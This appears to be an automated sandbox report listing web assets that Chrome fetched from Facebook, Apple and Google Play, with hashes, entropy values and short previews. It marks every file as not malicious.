                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 17 x 569, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2936
                                                                                                                                                                                                                                Entropy (8bit):7.492824796189044
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Yzg8aI9H81I9fkWIJrZ0TmIWHXU7TILF8qUx9pDshFNVR9WzxogKEuMOXJokI:l8aEc69f9wZ0DgF7Ux9xsd9AbVR
                                                                                                                                                                                                                                MD5:C52099A3430BD9F2A3F30613702ECD1D
                                                                                                                                                                                                                                SHA1:3D93D69D3A7A0485CD8678DAF7C729DFB4E7A93C
                                                                                                                                                                                                                                SHA-256:05E39A5F006C8AFE017A099E13E57762C6CFB42BDE83DD7FBF622D04AE483D5C
                                                                                                                                                                                                                                SHA-512:FE760FD5C097987F1991B06406FA26FDE9B89755305FDC1358B12E3C99BA47832561499EB9977C3DB09EEB5C4181F61F0E4C5DA9EDAF6DEAC5681BFB8434FED8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/ghLiHO2V3N4.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....p.!.....PLTEGpL......JNU777`gq.........BGO`gq...@DJ.........`gq...JNUHLSJNU......`gq......JNU.........`gq.................JNUJNU........JNU...JNUJNU......`gqJNUJNU...JNU......BGO.....777.....777BGO...`gq...bgo>..>..>..>..>..JNU...............JNU......JNU...DHO`gq.........`gqJNUKOV........KOVRW_...............JNU..........................`gq......>.......................`gq...777...BGO...777......>...........JNU..........................`gq...............`gq.........JNU......JNU`gq........................`gq`gq.........JNU...`gq...JNU...........>...........KOV...`gq............`gqKOV........................>..`gq...`gq...............JNUJNUJNU.........JNU...>..>..JNU...JNU............`gq`gq............`gq`gqJNU>.....>..>........JNU>..`gq........BGO777.........f.6m....tRNS.............:p....:.......e...;..lll........I.L........llllll....d.p.Ld.....d:......<T......t........:.88.....6....::::....d.x.......m.....g.E...jXz.....M<*.$(\$.<."`NzbbL..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1160)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9187
                                                                                                                                                                                                                                Entropy (8bit):5.266842047147773
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:Agj1KySQPgUbvhZ6Jv6zH+DcF5TXdPkHyFHeFtnnHTkK1Fr7c5JYORZwLPoMQpOx:ZjJdbvivgHxlPJ0Tkm6YBapU
                                                                                                                                                                                                                                MD5:5752D105EF41EE936D900C27042135DA
                                                                                                                                                                                                                                SHA1:D13E22CAE94DD18BCEB94EAEDEBAC5CC324A905E
                                                                                                                                                                                                                                SHA-256:1134D58118B3F3BEDDBDF0D2513363FDD34192AB718C28D425A66D5FF42594E6
                                                                                                                                                                                                                                SHA-512:FCA279604EBA0691F23B0AAAD54C50E598D12ACDFD84690A5E9232D89AD02239BBF6F19A451B6703C4E00FF31212F33FEB092628FC65BA0A9B7AEA28AFADBACA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css"
                                                                                                                                                                                                                                Preview:..div._3qw{height:auto;left:0;min-height:100%;position:absolute;right:0;top:0;z-index:400}._31e{position:fixed!important;width:100%}.webkit ._42w{position:absolute;top:0;visibility:hidden;width:1px}._3ixn{bottom:0;left:0;position:fixed;right:0;top:0}._3qw ._3ixn{background-color:rgba(255, 255, 255, .8)}._3qx ._3ixn{background-color:rgba(0, 0, 0, .9)}._4-hy ._3ixn{background-color:rgba(0, 0, 0, .4)}._99rc ._3ixn{-webkit-backdrop-filter:blur(20px);backdrop-filter:blur(20px);background-color:rgba(0, 0, 0, .5)}.._42ft{cursor:pointer;display:inline-block;text-decoration:none;white-space:nowrap}._42ft:hover{text-decoration:none}._42ft+._42ft{margin-left:4px}._42fr,._42fs{cursor:default}._afhc{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute;white-space:nowrap;width:1px}.._2agf{word-wrap:normal}._2agf._4o_4{display:inline-flex}._55pe{display:inline-block;overflow:hidden;text-overflow:ellipsis;vertical-align:top;white-space:nowrap}.form{margin:0;padding:0}label{color:
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2112)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):15767
                                                                                                                                                                                                                                Entropy (8bit):5.317199369389832
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:oDTfwJsGxuBRllOkUP7L4wX1lu1kL0tZJcfA8gT/6SdVQTu9ot:o3w6YuBRiaP/uNU/rG
                                                                                                                                                                                                                                MD5:5F9F4B37178B22CF0BC17D208D462D0F
                                                                                                                                                                                                                                SHA1:FC8811CBF718389DEF90F61F9B97B08CA38EE485
                                                                                                                                                                                                                                SHA-256:AFEBF18C540269CCB206F992F07AF41E3B1AD61697249502709AE68E39A94C1D
                                                                                                                                                                                                                                SHA-512:71744081CA31B871B5D8EC3573EBBF8D80B8875EC7B49D2392E70B4F2D4541F5E12808C7B5B0F98220E70969A3F88B1B89DD00C86CCFC6B7827BD54762685224
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/BGMvuu7HwCF.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractPopoverButton.react",["cx","URI","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j,k=j||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var d=b.prototype;d.render=function(){var a=this.props.config,b={},d=a.defaultMaxWidth;this.props.maxwidth!==void 0&&(d=this.props.maxwidth);d&&(b.style=babelHelpers["extends"]({},a.button.props.style,{maxWidth:d+"px"}));this.props.image&&(b.image=k.jsx("span",{className:"_-xe _3-8_",children:this.props.image}));this.props.label&&(b.labelIsHidden=this.props.labelIsHidden,b.label=k.jsx("span",{className:"_55pe",children:this.props.label}));this.props.haschevron&&(b.imageRight=k.jsx("span",{className:"_4o_3",children:a.chevron}));b.className=c("joinClasses")(a.button.props.className,"_2agf _4o_4");b.href=new(i||(i=c("URI")))("#");b["aria-haspopup"]=!0;b.role="button";return k.cloneElement(a.button,b)};return b}(k.Component);a.defaultProps={haschevron:!0};g[
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):295460
                                                                                                                                                                                                                                Entropy (8bit):3.495212786694065
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:l7LPmzd1gqbULBAinTuymkDw3llQU7ONoqmM2cN+AH1bS6qy4z:lXSgQixzklQB5+AHRS6G
                                                                                                                                                                                                                                MD5:1139AA954F85AFA4C72DCF785ED0CC47
                                                                                                                                                                                                                                SHA1:AB37E7D555F097D957AFE842C2C8817686E64BDA
                                                                                                                                                                                                                                SHA-256:92F2EB708642D7F8DED3DB9A0112B7C2AE2D8C12CBCBA8EFC45391F833ED2E9D
                                                                                                                                                                                                                                SHA-512:050CFF78351A55B273B5420FDC81C0C2F24B412B65575E2C485752A346B2BE6DBEDCBB0FF4920335E8592AB10476909047B247342E84B18928E18F63A4B48754
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4:2f81d12cea7a78:0
                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:assembler source, ASCII text, with very long lines (1528)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):11432
                                                                                                                                                                                                                                Entropy (8bit):5.391308424037816
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:+ybEUczjz2q8cpl8J0PY9pkYx7P05IEGtRQzTd8+klNHM0DzmdPZv:5EU0ce8Jp8S1ezB8Dhuhv
                                                                                                                                                                                                                                MD5:A0CA8DA461AE5296F5D57E3B4FA57D90
                                                                                                                                                                                                                                SHA1:A19FBC4243849E0C9BB10F4B12C85C72ACDA54D1
                                                                                                                                                                                                                                SHA-256:D589C4ABD359EDA36BFC12F42262D7E5EE0A23D6C32B35D59E9674E35D554462
                                                                                                                                                                                                                                SHA-512:018D08E6B5EC85F82006B2EB1955A20237C9563A355592D265FFC09D960672B5ABA703959A378A994B1F8748D0CCFB5FFECEDD44C02373C73D895C1A7B9E109F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/b-9VvptAdOY.css"
                                                                                                                                                                                                                                Preview:._9aya{margin:12px 12px 0 12px}._9ayn{background-color:#fff;border:1px solid rgba(0, 0, 0, .3);margin:24px auto;width:340px}._9ayf{background-color:#fff;border:1px solid rgba(0, 0, 0, .20);height:500px;margin:24px auto;pointer-events:none;width:340px}._9ayb{background-color:#a4a7ab;border-radius:4px;height:580px;margin:24px auto;position:relative;width:340px}._al24{border-radius:4px;margin:24px auto;width:340px}._9ss5{background-color:#fff;border:1px solid rgba(0, 0, 0, .20);border-radius:0}._9ayc{border:1px solid rgba(0, 0, 0, .20)}._9ayh{display:flex;justify-content:space-between}._9ayi{margin-left:24px;width:452px}._9ss4{margin-left:44px;width:375px}._als3{background-color:#fff;border-radius:16px;height:fit-content}.._5f0d{display:inline-block;overflow:hidden;position:relative;vertical-align:text-bottom}._5i4g{display:block;height:100%;position:absolute;width:100%;z-index:0}._5i4g._5sjv{image-rendering:-webkit-optimize-contrast;image-rendering:optimize-contrast;image-rendering:pixel
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                                Entropy (8bit):6.477824578243478
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPop3MRjT8FMRN2CMnmB1Chy8Zycp:6v/7gp3Mn+ML11ChHJ
                                                                                                                                                                                                                                MD5:893DE2346D9AA49AC73EDDCED7CFCC9B
                                                                                                                                                                                                                                SHA1:8B7A4CCB34076EBFB3D2DAC919F7A47849C425A9
                                                                                                                                                                                                                                SHA-256:65CE449FBA7DAD6F9F1AD9C7D74DACF6B74B671D46210676C908CCB636DD01DD
                                                                                                                                                                                                                                SHA-512:C25E40CEBA5B6C3D471AC9C934FDF63D839AD73E9BDBA9F9EF39685342BF1EA020CE45777019037ED71081BCDFAF24D2E485974D3553AB81DF428B89542224D4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB.........IDATX.....0.E.t.($ev.27.l....:.....l.|AsO.._..U....m.....}.:...EG.v..R75a.u.vg...ua....K}X.r&H. A....$.....D.=<....u..F.`.19....t...i.7...{.A..."e......IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (16485)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):50754
                                                                                                                                                                                                                                Entropy (8bit):5.58512671694989
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:IUvBxtxY0dVnQ5EkdXZV5h89ytW2Gp+Hs3uIgFg:txosVcZVs137
                                                                                                                                                                                                                                MD5:865D54109DBCA5EE3B19BDDDC8AD41B3
                                                                                                                                                                                                                                SHA1:6147FBDAF5A7F2D504CE5203889D2AA690525699
                                                                                                                                                                                                                                SHA-256:97156C9788A351A431C960D05FED3C89BC614C3838C2D6E027893F94FA25A66F
                                                                                                                                                                                                                                SHA-512:C23E3AFDACCA46519B4FA2221B2C609899FE500DB6F9F7733E77F698E51338949F14D06AA5BDA4BB0ACBB2AF3D1A5DF77FA61F340D3858994972FFC7A99F5364
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/0QTORSxRVO1.css"
                                                                                                                                                                                                                                Preview:._agn-{background-color:#1877f2;border-radius:50%;height:20px;width:20px}._agn-:hover{cursor:pointer}._agn-._agn_{background-color:#ebedf0;cursor:default}._agnz ._agn-{display:none}._agnz:hover ._agn-{display:block}.._agmu{background-color:#fff;border-radius:8px;box-shadow:0 2px 12px 2px rgba(0, 0, 0, .1);box-sizing:border-box;transition:height 200ms cubic-bezier(.08,.52,.52,1);width:416px}._agmu ._7w6q{outline:none}._agn0{height:300px;width:300px}.._ag0t{margin:0 -8px}._ag0t._ag0u ._ag0w{background-color:#ecf3ff}._ag0y{border-radius:4px;flex-grow:0;flex-shrink:0;height:16px;margin-right:8px;padding:4px;position:relative;width:16px}._ag0y._ag0u{background-color:#1877f2}._ag0y._ag0z{background-color:rgba(0, 0, 0, .05)}._ag0w{align-items:center;border-radius:6px;box-sizing:border-box;display:flex;padding:8px;width:100%}._ag0w:hover,._ag0t._ag0v ._ag0w{background-color:rgba(0, 0, 0, .05);text-decoration:none}._ag0w ._ag0x{min-width:0}.._ag7f{margin-bottom:24px}._ag7i{border-radius:8px;fle
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11083)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):47925
                                                                                                                                                                                                                                Entropy (8bit):5.63694271144091
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+BtmzebYJGgouKpwSfsbfjgBdtcI1hDRm+YTgfLFLZBk/cNxnOjMNBHLys14WXLb:WLf/0wtcIvPL9Pk/cNBxLys14WXB5H
                                                                                                                                                                                                                                MD5:A1E5572AB20DA021985F5FA17C38D4F3
                                                                                                                                                                                                                                SHA1:45E35F3D5778133577DD5F8F75E7648A08363688
                                                                                                                                                                                                                                SHA-256:71C88C8EB2871184AA06D114FCB5DD2DFB33D22611D48F15C5B2FCD427BD263C
                                                                                                                                                                                                                                SHA-512:54A43382CACB11813F55A7DF4D8A01C5E35C3F3CE0E3C6FCF2466F667F44E40F62F5E3E38D2F37F7CCDF105A66A802C388F6CEA5B150E9DFE82B1672EC461AD6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CometDensityAwarenessContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=!1;c=a.createContext(b);g["default"]=c}),98);.__d("CometGroupsPathingFunnelLogger",[],(function(a,b,c,d,e,f){"use strict";function a(a){switch(a){case"1635855486666999":return"REACTION_MENU_LIKE";case"1678524932434102":return"REACTION_MENU_LOVE";case"478547315650144":return"REACTION_MENU_WOW";case"115940658764963":return"REACTION_MENU_HAHA";case"908563459236466":return"REACTION_MENU_SORRY";case"444813342392137":return"REACTION_MENU_ANGER";case"613557422527858":return"REACTION_MENU_SUPPORT";default:return void 0}}function b(a,b,c){return}function c(a){return}function d(a,b){return}function e(a,b,c){return}function g(a){return}f.getReactionQPLPointFromReaction=a;f.start=b;f.addPoint=c;f.addSharedPoint=d;f.addEventSharedPoint=e;f.endCancel=g}),66);.__d("CometImageFromIXValueRelayWrapper_sprite.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4286
                                                                                                                                                                                                                                Entropy (8bit):4.639719888612948
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:EdAdhzUooooRoooT0oooooHooooooovqxoooooooooA:EkLL
                                                                                                                                                                                                                                MD5:A217F758EFDFFF14053678DBE58FA4D0
                                                                                                                                                                                                                                SHA1:6E0EB512C2F386D645712D7ECBE339EA85CFCA68
                                                                                                                                                                                                                                SHA-256:F343B3015D0545A7D5B719A434135BCAE2AC766ED459AEEA671E3688B79D1875
                                                                                                                                                                                                                                SHA-512:9BCF90FED875FFAF3170EF3425949642EB23B4E750CD42BA546D30E1A58C4FEE1A14CCDBD31455A6A442D09372CCB3873BD7477A59853608BC87660FB578119F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.gstatic.com/android/market_images/web/favicon_v3.ico
                                                                                                                                                                                                                                Preview:...... .... .........(... ...@..... .................................................................................................................................................................5C..5C..5C.]5C.5C.5C.`5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l.................................................. <../A.8D..5C..5C..5C..5C..5C.:5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................TN.(?..'>..8D..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l....................................................2..l...8..&>..8D..5C..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................../... ..m...8..&>..8D..5C..5C..5C..5C..5C..5C..5C.g5C..5C..5C..5C..5C..=/..$l...................................................E...>......m...8..%>..8D..5C..5C..5C..5C..5C..5C..5C..5C.?5C..5C..5C..=/..$l...................................................B..C...>......m...8..$=..8D..5C
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                Entropy (8bit):6.523312318185472
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:clyg1ZreK5l1GzQ9O9xbSj0hGqBBs+dK484MVYQkGAKAJlJwBNlWn:coWZaKBUdSghtBfI43M0VJlJkWn
                                                                                                                                                                                                                                MD5:F6FCD4D43487A3BF8F47A592569FAFEB
                                                                                                                                                                                                                                SHA1:22B1887F1C703EA9ED827A59B02AC7FCDF79CA54
                                                                                                                                                                                                                                SHA-256:C6AEC5614A1193CCECA829712C4027C6F1B94A106395D2223229861AE110A9A4
                                                                                                                                                                                                                                SHA-512:98ECA13BC52869440EE4319FD09AB3C076EFBD51F769052B8C85571236355E50D5426F15CFD67F4DC1942D07D72A0BF0706ACADBDFC5CD2082645CF746778443
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../......j.....]@G....51..C..G.3..<...w..#.O....{.P...I).......T./]......}..1^..|.~.}.B..B%.JP..%.\..%..$..K.Y,".\../?#..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (847)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):13822
                                                                                                                                                                                                                                Entropy (8bit):5.308557467153006
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:YPNfrSf3gy1fQx56zKsvEsSDIiFtTislPchPTwFlOvHChmC82YFK:YPNzSf3g6zKIHqtpRKEuvHTC82Yg
                                                                                                                                                                                                                                MD5:2A92CDD99A42BFCD7DAB16887539E231
                                                                                                                                                                                                                                SHA1:310E2855E334F6F49937490D621710021B15066B
                                                                                                                                                                                                                                SHA-256:F20C946DA61069DF3F4DC8097FB617DB50F266D25D53758D91FCCBD8341C533C
                                                                                                                                                                                                                                SHA-512:7DBD1CA6AF6E7AA86F408C6E3D5D35AA49AD39908D8AB10AEF4CF8C806AF27889DA43D8AEDDEE030E6351DF1D81442B431C6AF206A4DF6E9BFB043892850EF49
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.15.097368f212a6a942763f.js
                                                                                                                                                                                                                                Preview:/*! For license information please see chunk.15.097368f212a6a942763f.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[15],{21015:function(e,t,n){"use strict".e.exports={canvasAvailable:n(1892),continuousScrollEventsAvailable:n(93117),cookiesAvailable:n(2022),cssLinearGradientAvailable:n(83353),cssPropertyAvailable:n(15871),cssViewportUnitsAvailable:n(77499),elementAttributeAvailable:n(13462),eventTypeAvailable:n(70683),isDesktop:n(13459),isHandheld:n(30677),isRetina:n(25152),isTablet:n(53489),localStorageAvailable:n(83574),mediaElementsAvailable:n(58093),mediaQueriesAvailable:n(28342),prefersReducedMotion:n(54719),sessionStorageAvailable:n(63160),svgAvailable:n(91676),threeDTransformsAvailable:n(78795),touchAvailable:n(50012),webGLAvailable:n(72810)}},1892:function(e,t,n){"use strict".var r=n(93796),i=n(6379),o=function(){var e=r.getDocument().createElement("canvas").return!("function"!=typeof e.getContext||!e.getContext("2d"))}.e
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 109728, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):109728
                                                                                                                                                                                                                                Entropy (8bit):7.997823232989331
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:7t3W6oY1OkObRhMyHpX5Rg3hEGawMCrv7m75sxECTMQ9vZE6LV9bkMReEU7KsKcr:7tG6oocR2YL23hkgfmdsZhZRlReIsQW
                                                                                                                                                                                                                                MD5:D1883D2801247347DA20FDE4DC14631F
                                                                                                                                                                                                                                SHA1:C26710335E7339541609B6B491C6726834C2C275
                                                                                                                                                                                                                                SHA-256:26B85AE5213566F5E191AA4FBA212EE1DBFA010D5E31E0512A98D3699861C15B
                                                                                                                                                                                                                                SHA-512:712391093BC4BEE069B057FA0197EAB3CD30F41317A69827F7432A601C76FEFF2D307EA8D1A61D5EAEE0667A17FBFD8F6F8BC3B0CCFA7BAB3335ECFE064ED0A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Text/v2/sf-pro-text_semibold.woff2
                                                                                                                                                                                                                                Preview:wOF2..............nx...=...........................,..H.`*H...>...d....6.$..$..(.. ?meta....H. 8.t[zx.A[.m;_.vqXTA}..d......h../.j.1..)Do..\A...-.t.M.B..rr..........u2.u...I...@lVH.Z......c.!WU.h.....i..w......i.....Do..p*Fe0...A...M-..E.=!......y.43..*.*..../i..Z.+m{n.].f3Sz....a.N..NF.E..|y...q...n.;jl.9...N.......XVK..S.*|.=.<..e..M.".....j.5.....?~..F.,.W......|z.W_.t|.9.!'t....M3.pH8.&...{.~....TR#....=Zt....:...~.H....p.W/j:.A.....n..G.P....:.I...G.qukm+cx..7..S.l;!=....J.?.....0.X.......27.`...)b...D...H)F...s1.e.7._....R....s7.0j.L8.+..0.......,:W.~..9"....fxR9.TgqyR...c.Xe.iQ5....o...k....._.-.3.).X../.0.(.m.?.F...).]=..|iB...jL.....j.V...@..eY.....+K.....#.....l.......?$F)T.Zbg0.\.F.z.G..../....&....@.xt....4.By...zI3.~;0..mOD..j..:..E.._.|^N.D.d,_-..cc...OdO.J....m4DHS.I.......?'v...R..hm.U.%.J.......?......J.......nfm...M{nn...9..;c.r.>w.qr...:c.si..P.Jk..Eh._.6..;..'3....i..N.d8.[.&.....VT{^..!1...$..K.=..o........#.d...|.Dy..P..E8...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):686
                                                                                                                                                                                                                                Entropy (8bit):7.598746043153558
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:3Wgb1D5zUWvKZPlpLC4U1KZmipXyg5iLUl9KQhoMQdHtLPhW7UdvnMoO6IBHhpW:3zDWlpu4U1KRL91mHAUdv70HW
                                                                                                                                                                                                                                MD5:7B84B8DD3AF91F4EFB81F14311422377
                                                                                                                                                                                                                                SHA1:ACDB0366714033A533A8E3F7C7C2518F8922C9F6
                                                                                                                                                                                                                                SHA-256:3994FA5DC726B6D4449BDE23EF495775D259E7B6086161AC379AEE60B5887A14
                                                                                                                                                                                                                                SHA-512:168C3BA1434E4FE56BF6E421C6F98A5C4645D2BF335586FEFC76E5A2547247A97F76C4F948C79B8DC2206E06EB2B68C4FD93ADE7E224121199C79ED83A049452
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../?....%j..I.?..\qe...m.m..m..........E.......g.z..{..?z.8^.=s..q.&..G......0&...??.m.1gn.."2.....8..v..Wu.....H.W..,..%(..:.~Z..P....z..~O.h..u...F..X.0GB...3@..+...:...vb.5.R......-.+..S.....@.Xw.>."U..o..-.:.....j.i1...lI0p...8=....@.Xw...X.J2......&/..O..d.Y..v....x... 5.D5=J.....?..w.`O(q...`oE.B.##.}..d.s].O.j.d...5...y...3...]D...BY.7...b..FV..Uk...q\..>.X...t.j....+..D}ezP.cW..D>T3...+M...'TS.I...;..3I>.M.5.'DDf....`.......w......Wu..^4I.r.+z...T.{,m."l..d5......)._.....w..6..@.!s..7.%.$...MD....5.\....Jp..............t.b..k.........>-.7).~.....X..RP....7.b,k..Yh.I..-..l....Y...J-.Jl.U{I.[....(.{....h.BViYQ...3....
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10467)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):175637
                                                                                                                                                                                                                                Entropy (8bit):5.543169719587562
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:4ghUaItJU64CI4gCEMcqdEc9QkLv1vQcqdI08QBVMJ6FIOKaKtYBZ:4ghUaItJU64T4gCEMcexQkLv1vQceI0h
                                                                                                                                                                                                                                MD5:F9A32D9AA0001580F8F84862DCEB9ED2
                                                                                                                                                                                                                                SHA1:027A1D65EA4500404BF33F155C52E592BE9267B1
                                                                                                                                                                                                                                SHA-256:D4C628FF740F0C7D7637EDC1FE6DC8A90EC8A24A406D3C83F2E99128D624E398
                                                                                                                                                                                                                                SHA-512:BF5312CCFE75EA7BECD7A007C0BFD06F4285D9ED29BB848DDE8C41961F24CC7E3343D5332E6AA7F2B717A58AD8F2258DBC32BE84794FB2FBBCF7882DF5F4CC27
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
